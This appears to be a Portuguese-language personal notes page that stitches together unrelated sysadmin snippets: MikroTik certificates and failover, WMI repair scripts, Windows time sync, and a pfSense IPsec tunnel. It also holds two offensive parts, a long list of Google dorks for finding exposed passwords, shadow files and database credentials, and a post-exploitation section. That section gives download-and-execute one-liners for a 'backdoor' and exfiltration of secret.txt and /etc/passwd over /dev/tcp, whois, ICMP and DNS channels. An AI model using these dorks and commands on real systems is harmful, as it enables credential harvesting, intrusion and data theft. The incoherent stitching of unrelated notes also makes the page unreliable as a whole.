"cpanel username" "cpanel password" ext:txt
"insert into users" "VALUES" ext:sql | ext:txt | ext:log | ext:env
"password 7" ext:txt | ext:log | ext:cfg
intitle:"index of" "idx_config"
"mailer_password:" + "mailer_host:" + "mailer_user:" + "secret:" ext:yml
intext:construct('mysql:host
"keystorePass=" ext:xml | ext:txt -git -gitlab
"define('SECURE_AUTH_KEY'" + "define('LOGGED_IN_KEY'" + "define('NONCE_KEY'" ext:txt | ext:cfg | ext:env | ext:ini
intitle:"index of" "anaconda-ks.cfg" | "anaconda-ks-new.cfg"
"define('DB_USER'," + "define('DB_PASSWORD'," ext:txt
intitle:"index of" "config.exs" | "dev.exs" | "test.exs" | "prod.secret.exs"
jdbc:oracle://localhost: + username + password ext:yml | ext:java -git -gitlab
jdbc:postgresql://localhost: + username + password ext:yml | ext:java -git -gitlab
jdbc:mysql://localhost:3306/ + username + password ext:yml | ext:javascript -git -gitlab
"spring.datasource.password=" + "spring.datasource.username=" ext:properties -git -gitlab
ext:log password END_FILE
site:pastebin.com intext:admin.password
"db.username" + "db.password" ext:properties
ext:cfg "g_password" | "sv_privatepassword" | "rcon_password" -git -gitlab
"server.cfg" ext:cfg intext:"rcon_password" -git -gitlab
"anaconda-ks.cfg" | "ks.cfg" ext:cfg -git -gitlab
rootpw --iscrypted ext:cfg
"admin_password" ext:txt | ext:log | ext:cfg
"index of" "password.ini"
filetype:log intext:password after:2015 intext:@gmail.com | @yahoo.com | @hotmail.com
"'username' =>" + "'password' =>" ext:log
ext:txt intext:@yahoo.com intext:password
intitle:"database.php" inurl:"database.php" intext:"db_password" -git -gitlab
ext:xls intext:@gmail.com intext:password
"POSTGRES_PASSWORD=" ext:txt | ext:cfg | ext:env | ext:ini | ext:yml | ext:sql -git -gitlab
"/** MySQL database password */" ext:txt | ext:cfg | ext:env | ext:ini
"EMAIL_HOST_PASSWORD" ext:yml | ext:env | ext:txt | ext:log
allintext:"redis_password" ext:env
intext:"db_database" ext:env intext:"db_password"
"Index of" "/yahoo_site_admin/credentials"
allintext:password filetype:log
inurl:logs intext:GET https:// ext:txt intext:password intext:username
intitle:"index of" "/master.passwd"
"MYSQL_ROOT_PASSWORD:" ext:env OR ext:yml -git
filetype:env "DB_PASSWORD"
"index of" ".env"
intext:"Index of /password"
"config.php.bak" intitle:"index of"
intitle:"index of" "config.neon" OR "config.local.neon"
intitle:"index of" "passwords.xlsx"
inurl:*helpdesk* intext:"your default password is"
"MasterUserPassword" ext:cfg OR ext:log OR ext:txt -git
"/etc/shadow root:$" ext:cfg OR ext:log OR ext:txt OR ext:sql -git
intitle:"index of " "*.passwords.txt"
"admin password irreversible-cipher" ext:txt OR ext:log OR ext:cfg
"super password level 3 cipher" ext:txt OR ext:log
intitle:"index of" "db.ini"
intitle:"index of" "database.ini" OR "database.ini.old"
intitle:"index of" application.ini
intitle:"index of" "db.connection.js"
"d-i passwd/root-password-crypted password" ext:cfg
"configure account user encrypted" ext:cfg
"create account" admin ext:cfg
password console-password ext:cfg -git
"enable password" ext:cfg -git -cisco.com
intitle:"Index of" dbconnect.inc
intext:authentication set encrypted-password ext:cfg
intitle:"index of" "passwords.yml"
intitle:"index of" "credentials.yml"
intext:"WPENGINE_SESSION_DB_USERNAME" || "WPENGINE_SESSION_DB_PASSWORD"
intext:"username=" AND "password=" ext:log
intitle:index.of "creds.txt"
intitle:"index of" share.passwd OR cloud.passwd OR ftp.passwd -public
intitle:"index of" "db.conf"
intitle:"Index of" password.txt
"contrasena" filetype:sql -github.com
intext:"@gmail.com" intext:"password" inurl:/files/ ext:txt
intitle:"index of" "ftp.passwd"
intitle:"index of" "htpasswd.txt"
"pass" "usuario" filetype:sql
intext:"aspx" filetype:txt login & password
inurl:users.json + "username"
intext:"wordpress" filetype:xls login & password
s3 site:amazonaws.com filetype:xls password
inurl:login.txt filetype:txt
inurl:wp-config.php intext:DB_PASSWORD -stackoverflow -wpbeginner
intitle:settings.py intext:EMAIL_USE_TLS -git -stackoverflow
intitle:settings.py intext:EMAIL_HOST_PASSWORD -git -stackoverflow
username | password inurl:resources/application.properties -github.com -gitlab
filetype:xml config.xml passwordHash Jenkins
intext:jdbc:oracle filetype:java
filetype:txt $9$ JunOS
filetype:reg reg HKEY_CURRENT_USER intext:password
inurl:"standalone.xml" intext:"password>"
/_wpeprivate/config.json
inurl:"build.xml" intext:"tomcat.manager.password"
intitle:"index of" intext:login.csv
inurl:"trello.com" and intext:"username" and intext:"password"
inurl:"wp-license.php?file=../..//wp-config"
"battlefield" "email" site:pastebin.com
inurl:wp-config.bak
intext:"rabbit_password" | "service_password" filetype:conf
"whoops! there was an error." "db_password"
intext:"login" department | admin | manager | company | host filetype:xls | xlsx -community -github
intext:"please change your" password |code | login file:pdf | doc | txt | docx -github
inurl:configuration.php and intext:"var $password="
inurl:/dbcp.properties + filetype:properties -github.com
intext:define('AUTH_KEY',     ' wp-config.php filetype:txt
inurl:wp-config-backup.txt
"password.xlsx" ext:xlsx
filetype:env intext:REDIS_PASSWORD
intitle:"index.of" inurl:"cvs" login | passwd | password | access | pass -github -pub
site:showmyhomework.co.uk/school/homeworks/ "password"
filetype:doc inurl:"gov" intext:"default password is"
site:trello.com intext:mysql AND intext:password -site:developers.trello.com -site:help.trello.com
intext:"PuTTY log" ext:log "password" -supportforums -github
inurl:"/App.Config" + ext:config + "password=" -github -git
intitle:"Index of" intext:"Login Data"
inurl:"servlet/ViewFormServlet?" "pwd"
Codeigniter filetype:sql intext:password | pwd intext:username | uname intext: Insert into users values
intitle:"index.of" "places.sqlite" "Mail" thunderbird -mozilla.org -scan
ext:ini Robust.ini filetype:ini "password"
filetype:config "" "password" "web.config" -stackoverflow -youtube.com -github
intitle:"index.of" "places.sqlite" "key3.db" -mozilla.org
inurl:"config.xml" "password" ext:xml -stackoverflow.com -github.com

Fonte: https://www.boxpiper.com/posts/google-dork-list-files-password

Ao acessar a console do Mikrotik, digite:

/certificate

CA:

add name=ca-template common-name=CA-OVPN days-valid=3650 key-size=2048 key-usage=crl-sign,key-cert-sign
sign ca-template name=CA-OVPN

SERVER (Precisa alterar na configuração do servidor OVPN):

add name=server-template common-name=SERVER-OVPN days-valid=3650 key-size=2048 key-usage=digital-signature,key-encipherment,tls-server
sign server-template name=SERVER-OVPN ca=CA-OVPN

Clientes:

add name=client-template common-name=cliente01 days-valid=3650 key-size=2048 key-usage=tls-client
sign client-template name=cliente01 ca=CA-OVPN
add name=client-template common-name=cliente02 days-valid=3650 key-size=2048 key-usage=tls-client
sign client-template name=cliente02 ca=CA-OVPN

Cenario:
Ether1 – link principal
Ether2 – link secundario
Criar as rotas default:
/ip route
add dst-address=0.0.0.0/0 gateway=192.168.1.1 distance=1 comment=principal

add dst-address=0.0.0.0/0 gateway=192.168.2.1 distance=2 comment=secundario

add dst-address 208.67.222.222 gateway 192.168.1.1 scope=10 comment=Monitor Link Principal check-gateway=ping

add dst-address 1.1.1.1 gateway 192.168.2.1 scope=10 comment=Monitor Link Secundario check-gateway=ping

Colocar no Netwatch:
IP a ser monitorado link principal: 208.67.222.222
UP:
/ip route enable [find comment=”principal”]
/log error “O link principal caiu”

Down:
/ip route disable [find comment=”principal”]
/log error “O link principal caiu”

IP a ser monitorado link secundario: 1.1.1.1
UP:
/ip route enable [find comment=”secundario”]
/log error “O link secundario normalizou”

Down:
/ip route disable [find comment=”secundario”]
/log error “O link secundario caiu”

winmgmt /verifyrepository

Actions to try

First try the following actions to see if they resolve your issue:

a. Re-register all of the dlls and recompile the .mofs in the wbem folder and re-registering WMI Service and Provider. You can use the following script by saving to txt file then renaming to .bat and running from command prompt with admin right and changing focus to following directory: C:\Windows\System32\Wbem.

@echo off
sc config winmgmt start= disabled
net stop winmgmt /y
%systemdrive%
cd %windir%\system32\wbem
for /f %%s in (‘dir /b *.dll’) do regsvr32 /s %%s
wmiprvse /regserver
winmgmt /regserver
sc config winmgmt start= auto
net start winmgmt
for /f %%s in (‘dir /s /b *.mof *.mfl’) do mofcomp %%s

b. Reboot the machine and test WMI

Next, check the repository for consistencies:

For Windows Vista, Windows 7, Windows Server 2008, and Windows Server 2008 R2, you can run winmgmt /verifyrepository from a command prompt.
For Older OS like Windows XP and Windows Server 2003 run: WmiDiag tool with the checkconsistency option. For example: WmiDiag checkconsistency

If repository is found to be inconsistent:

SCRIPT

REM Check if WMI is functioning correctly or not
REM Get computername from WMI
wmic computersystem get name
IF %ERRORLEVEL% EQU 0 goto success
:failure

cd c:\windows\SysWOW64\WBEM

FOR /f %s in (‘dir /b /s *.dll’) do regsvr32 /s %s
Net stop /y winmgmt
FOR /f %s in (‘dir /b *.mof *.mfl’) do mofcomp %s
Net start winmgmt

goto end
:success
goto end
:end

===============================

a. For Vista and newer, run from elevated command prompt:

Winmgmt /salvagerepository

Note this command will take the content of the inconsistent repository and merge it into the rebuilt repository if it is readable

If the above doesn’t work, then run:

Winmgmt /resetrepository

Note this will reset repository to the initial state when the OS was first installed

For Windows XP and Windows Server 2003, there are no built in switches to rebuild the Repository, so you must do it manually.

Warning: Rebuilding the WMI repository has resulted in some 3rd party products not working until their setup is re-run & their MOF re-added back to the repository.

If /salvagerepository or /resetrepository does not resolve the issue, then manually rebuild repository:

Change startup type to Window Management Instrumentation (WMI) Service to disabled
Stop the WMI Service; you may need to stop IP Helper Service first or other dependent services before it allows you to stop WMI Service
Rename the repository folder:  C:\WINDOWS\system32\wbem\Repository to Repository.old
Open a CMD Prompt with elevated privileges
CD windows\system32\wbem
for /f %%s in ('dir /b /s *.dll') do regsvr32 /s %%s
Set the WMI Service type back to Automatic and start WMI Service
cd /d c:\  ((go to the root of the c drive, this is important))
for /f %%s in ('dir /s /b *.mof *.mfl') do mofcomp %%s
Reboot the server

Finally, install latest hotfixes for WMI as they can help prevent issue from recurring. If you continue to have recurring WMI repository corruption issues on same machine, please engage a Microsoft Support Engineer for further troubleshooting and assistance.

=====================================================

Additionally, your computer must have the Terminal Service role and the Windows System Resource Manager feature installed.
Restart requirement
You must restart the computer after you apply this hotfix.
Registry information
Important This section, method, or task contains steps that tell you how to modify the registry. However, serious problems might occur if you modify the registry incorrectly. Therefore, make sure that you follow these steps carefully. For added protection, back up the registry before you modify it. Then, you can restore the registry if a problem occurs. For more information about how to back up and restore the registry, click the following article number to view the article in the Microsoft Knowledge Base:
322756 How to back up and restore the registry in Windows

You can use the following registry entry to change the interval between the WMI polling queries that are used by the Accounting feature:

Location: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\WSRM\Parameters
Name: PollingInterval
Type: REG_DWORD
Value: Polling query interval in seconds

The
PollingInterval
registry entry specifies the interval in seconds. The default value is 30 (30 seconds).

After you install this hotfix, you can use the following registry entry to change the interval between the WMI polling queries:

Location: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\WSRM\Parameters
Name: ClusterSvcStatusPollInterval
Type: REG_DWORD
Value: Polling query interval in seconds

The
ClusterSvcStatusPollInterval
registry entry specifies the interval in seconds. The default value is 300 (5 minutes).
File information
The English version of this hotfix has the file attributes (or later file attributes) that are listed in the following table. The dates and times for these files are listed in Coordinated Universal Time (UTC). When you view the file information, it is converted to local time. To find the difference between UTC and local time, use the Time Zone tab in the Date and Time item in Control Panel.
For all supported x86-based versions of Windows Server 2008

Fontes:

http://www.ittrainingday.com/2013/01/rebuilding-wmi-windows-management.html

http://blogs.technet.com/b/configmgrteam/archive/2009/05/08/wmi-troubleshooting-tips.aspx

http://msdn.microsoft.com/en-us/library/aa394603(VS.85).aspxhttp://eskonr.com/2012/01/how-to-fix-wmi-issues-automatically/

http://eskonr.com/2009/03/how-to-troubleshoot-the-systems-which-has-wmi-issues-rebuild-wmi-repository/

Em alguns casos servidores virtuais que estão em Workgroup (fora do domínio), ficam atualizando o relógio de acordo com a cmos, e se o servidor físico estiver em outro país o horário fica divergente, para corrigir isso execute os seguintes passos:

Abra um prompt de comando como Administrador.

Configure uma fonte de hora externa e faça com que ela seja uma fonte de hora confiavel:

w32tm /config /manualpeerlist:"a.ntp.br, b.ntp.br" /syncfromflags:manual /reliable:yes /update

Reinicie o serviço de hora:

net stop w32time && net start w32time

Valide a origem da sincronização e o estado:

w32tm /query /peers

Inicie uma sincronização manual:

w32tm /resync /rediscover

Caso encontre o erro:

w32tm /query /peers

The following error occurred: Element not found. (0x80070490)

Ocorreu o seguinte erro: Elemento não encontrado. (0x80070490)

Realize o seguinte procedimento:

w32tm /register

net stop w32time && net start w32time

Isso deve resolver o problema de troca de fuso horário.

Caso o windows apresente o erro 0x80070422 ao tentar fazer uma atualização, vá em serviços (iniciar / executar / services.msc), pare o serviço “Windows Update”, vá até a pasta: “c:\windows\SoftwareDistribution” e remova todo o conteudo da pasta. Inicie o serviço “Windows Update” e verifique se o serviço “Instalador de Modulos” está em execução também.
Procure novamente por atualizações.

Bloqueio de port scan, essa regra pode ser personalizada, caso seja utilizada da foma abaixo, caso o IP de origem consulte 2 portas diferente em menos de 1 segundo o Mikrotik irá fazer o bloqueio do IP de origem por 30 minutos, é necessário criar um Address List com o nome “Whitelist” e adicionar os IPs que não devem ser bloqueados nunca. E a lista “WanInterfaces” é a lista com as interfaces Wan do roteador:

Adiciona Port Scanner a lista de bloqueios
/ip firewall filter add chain=input action=add-src-to-address-list tcp-flags=syn connection-limit=!3,32 protocol=tcp src-address-list=!Whitelist address-list=Port_Scanner
address-list-timeout=30m connection-rate=0-4294967295 in-interface-list=WanInterfaces limit=1,1:packet log=yes log-prefix=”=== Bloqueio de Scanner ===”

Lembrando que é necessário a regra que essa regra seja adicionado antes para descartar as proximas conexões do IP de origem, pois a regra acima adiciona o IP na lista “port_Scanner e essa regra descarta os IPs que estiverem nessa lista:

Block Offenders
/ip firewall filter add chain=input action=drop src-address-list=Port_Scanner log=no log-prefix=”=== Block Offenders ===

Criar um servidor HTTP
Os comandos abaixo iniciam um serviço HTTP no diretório atual, na porta 1337.

python2:
python -m SimpleHTTPServer 1337

python3:
python -m http.server 1337

Ruby:
ruby -rwebrick -e’WEBrick::HTTPServer.new(:Port => 1337, :DocumentRoot => Dir.pwd).start’

Ruby 1.9.2+:
ruby -run -e httpd . -p 1337

Perl:
perl -MHTTP::Server::Brick -e ‘$s=HTTP::Server::Brick->new(port=>1337); $s->mount(“/”=>{path=>”.”}); $s->start’
perl -MIO::All -e ‘io(“:8080”)->fork->accept->(sub { $_[0] < io(-x $1 +? “./$1 |” : $1) if /^GET \/(.*) / })’

PHP 5.4+:
php -S 0.0.0.0:1337

busybox httpd:
busybox httpd -f -p 8000

Baixar e executar os arquivos a partir do servidor HTTP

Abaixo estão algumas maneiras de baixar e executar arquivos de um servidor HTTP usando as próprias ferramentas do sistema nos sistemas Windows e Linux.

WINDOWS

powershell:
powershell (new-object System.Net.WebClient).DownloadFile(‘http://1.2.3.4/5.exe’,’c:\download\a.exe’);start-process ‘c:\download\a.exe’

Certutil:
certutil -urlcache -split -f http://1.2.3.4/5.exe c:\download\a.exe&&c:\download\a.exe

bitsadmin:
bitsadmin /transfer n http://1.2.3.4/5.exe c:\download\a.exe && c:\download\a.exe

Os seguintes comandos farão download apenas do arquivo indicado:

regsvr32:
regsvr32 /u /s /i:http://1.2.3.4/5.exe scrobj.dll

LINUX

Curl:
curl http://1.2.3.4/backdoor

Wget:
wget http://1.2.3.4/backdoor

awk:

awk 'BEGIN {
  RS = ORS = "\r\n"
  HTTPCon = "/inet/tcp/0/127.0.0.1/1337"
  print "GET /secret.txt HTTP/1.1\r\nConnection: close\r\n"    |& HTTPCon
  while (HTTPCon |& getline > 0)
      print $0
  close(HTTPCon)
}'

Use um servidor HTTP com o método PUT

Com nginx:

mkdir -p /var/www/upload/ # cria diretorio
chown www-data:www-data /var/www/upload/ # trocar permissões
cd /etc/nginx/sites-available # entrar no diretorio virtual do nginx

# escreve a configuração no arquivo file_upload
cat < file_upload
server {
    listen 8001 default_server;
    server_name kali;
        location / {
        root /var/www/upload;
        dav_methods PUT;
    }
}
EOF
# gravação concluida
cd ../sites-enable # ir até o diretorio inicial
ln -s /etc/nginx/sites-available/file_upload file_upload # ativar file_upload
systemctl start nginx # iniciar Nginx 

Com Python:

Por ej. HTTPutServer.py:

# ref: https://www.snip2code.com/Snippet/905666/Python-HTTP-PUT-test-server
import sys
import signal
from threading import Thread
from BaseHTTPServer import HTTPServer, BaseHTTPRequestHandler

class PUTHandler(BaseHTTPRequestHandler):
    def do_PUT(self):
        length = int(self.headers['Content-Length'])
        content = self.rfile.read(length)
        self.send_response(200)
        with open(self.path[1:], "w") as f:
            f.write(content)


def run_on(port):
    print("Starting a HTTP PUT Server on {0} port {1} (http://{0}:{1}) ...".format(sys.argv[1], port))
    server_address = (sys.argv[1], port)
    httpd = HTTPServer(server_address, PUTHandler)
    httpd.serve_forever()


if __name__ == "__main__":
    if len(sys.argv) < 3:
        print("Usage:\n\tpython {0} ip 1337".format(sys.argv[0]))
        sys.exit(1)
    ports = [int(arg) for arg in sys.argv[2:]]
    try:
        for port_number in ports:
            server = Thread(target=run_on, args=[port_number])
            server.daemon = True # Do not make us wait for you to exit
        server.start()
        signal.pause() # Wait for interrupt signal, e.g. KeyboardInterrupt
    except KeyboardInterrupt:
        print "\nPython HTTP PUT Server Stoped."
        sys.exit(1)

Modo de funcionamento:

$ python HTTPutServer.py 10.10.10.100 1337
Starting a HTTP PUT Server on 10.10.10.100 port 1337 (http://10.10.10.100:1337) ...

Enviar arquivos por HTTP PUT Linux com Curl:

$ curl --upload-file secret.txt http://ip:port/

Com Wget:

$ wget --method=PUT --post-file=secret.txt http://ip:port/

Windows Powershell:

$body = Get-Content secret.txt
Invoke-RestMethod -Uri http://ip:port/secret.txt -Method PUT -Body $body

Transferencia de arquivos usando Bash /dev/tcp 

Primeiro precisamos subir uma porta no equipamento onde irá receber o arquivo:

nc -lvnp 1337 > secret.txt

No dispositivo de envio:

cat secret.txt > /dev/tcp/ip/port

Transferencia de arquivos usando o protocolo SMB 

Criar um servidor SMB simples. Para configurar o servidor SMB necessitaremos usar o Impacket: https://github.com/SecureAuthCorp/impacket.

Impacket está instalado por padrão no Kali Linux (smbserver.py).

Sintaxe: impacker-smbserver ShareName SharePath
Exemplo: impacker-smbserver share `pwd`

Baixar arquivos a partir do servidor SMB:

copy \\IP\ShareName\file.exe file.exe

Copiar arquivos para o servidor SMB:

net use x: \\IP\ShareName
copy file.txt x:
net use x: /delete

Transferencia de arquivos usando o comando whois: 

Receptor Host B:

nc -vlnp 1337 | sed "s/ //g" | base64 -d

Envío a partir do Host A:

whois -h 127.0.0.1 -p 1337 `cat /etc/passwd | base64`

Transferencia de arquivos usando o comando ping: 

Receptor Host B:
Baixar o arquivo ping_receiver.py

import sys

try:
    from scapy.all import *
except:
    print("Scapy not found, please install scapy: pip install scapy")
    sys.exit(0)


def process_packet(pkt):
    if pkt.haslayer(ICMP):
        if pkt[ICMP].type == 8:
            data = pkt[ICMP].load[-4:]
            print(f'{data.decode("utf-8")}', flush=True, end="", sep="")

sniff(iface="eth0", prn=process_packet)

E executar:

python3 ping_receiver.py

Envío desde host A:

xxd -p -c 4 secret.txt | while read line; do ping -c 1 -p $line ip; done

Transferencia de arquivos usando o comando dig: 

Receptor Host B:

O código a seguir utiliza os módulos scapy do Python, é necessário instala-lo manualmente.

Você precisa salvar o código em dns_receiver.py:

try:
    from scapy.all import *
except:
    print("Scapy not found, please install scapy: pip install scapy")

def process_packet(pkt):
    if pkt.haslayer(DNS):
        domain = pkt[DNS][DNSQR].qname.decode('utf-8')
        root_domain = domain.split('.')[1]
        if root_domain.startswith('gooogle'):
            print(f'{bytearray.fromhex(domain[:-13]).decode("utf-8")}', flush=True, end='')

sniff(iface="eth0", prn=process_packet)

E executa-lo:

python3 dns_receiver.py

Transferencia de arquivos usando netcat: 

Receptor:

nc -l -p 1337 > 1.txt

Enviador:

cat 1.txt | nc -l -p 1337

ou

nc 10.10.10.200 1337 < 1.txt

Em alguns casos você não pode usar o nc, podemos usar o Bash /dev/tcp para receber o arquivo:

cat < /dev/tcp/10.10.10.200/1337 > 1.txt

Fonte: https://www.hackplayers.com/2019/09/transferir-archivos-post-explotacion.html?m=1

Tunel IPSEC utilizando IPs virtuais (rede lan com a mesma faixa de rede) no pfSense

Caso precise fechar um tunel IPSEC e a rede LAN seja igual em ambos os lados faça o seguinte procedimento:

Ambiente:

Escritório1
LAN: 192.168.0.0/24
Rede LAN Virtual no IPSEC 100.100.100.0/24

Escritório2
LAN: 192.168.0.0/24
Rede LAN Virtual no IPSEC 200.200.200.0/24

Configurações necessárias no pfSense do escritório 1:

Criar um Virtual IP (Firewall -> Virtual IP) do tipo IP Alias, na interface LAN com o endereço IP: 100.100.100.0/24 (a rede 100.100.100.0/24) Será a rede Lan “virtual” do escritório 1.

Criar uma interface para o tunel (Interfaces -> Assignments), e depois em Interfaces (OPT) ou o nome da nova interface, renomear como desejar e ativar ela.

Adicionar as rotas: System -> Routing, 200.200.200.0/24 apontando para a interface que você criou.

Criar o Nat de saida, (Firewall -> Nat -> Outbound), deixar em Manual, Salvar. Interface (Placa Wan), Source: 192.168.0.0/24, Destination: Network: 200.200.200.0/24, Address: 100.100.100.1.

Mudar a Phase 2 do tunel para Routed (VTI).

Repetir esses passos para o escritório invertendo as redes.

Pronto, a comunicação deverá ocorrer normalmente.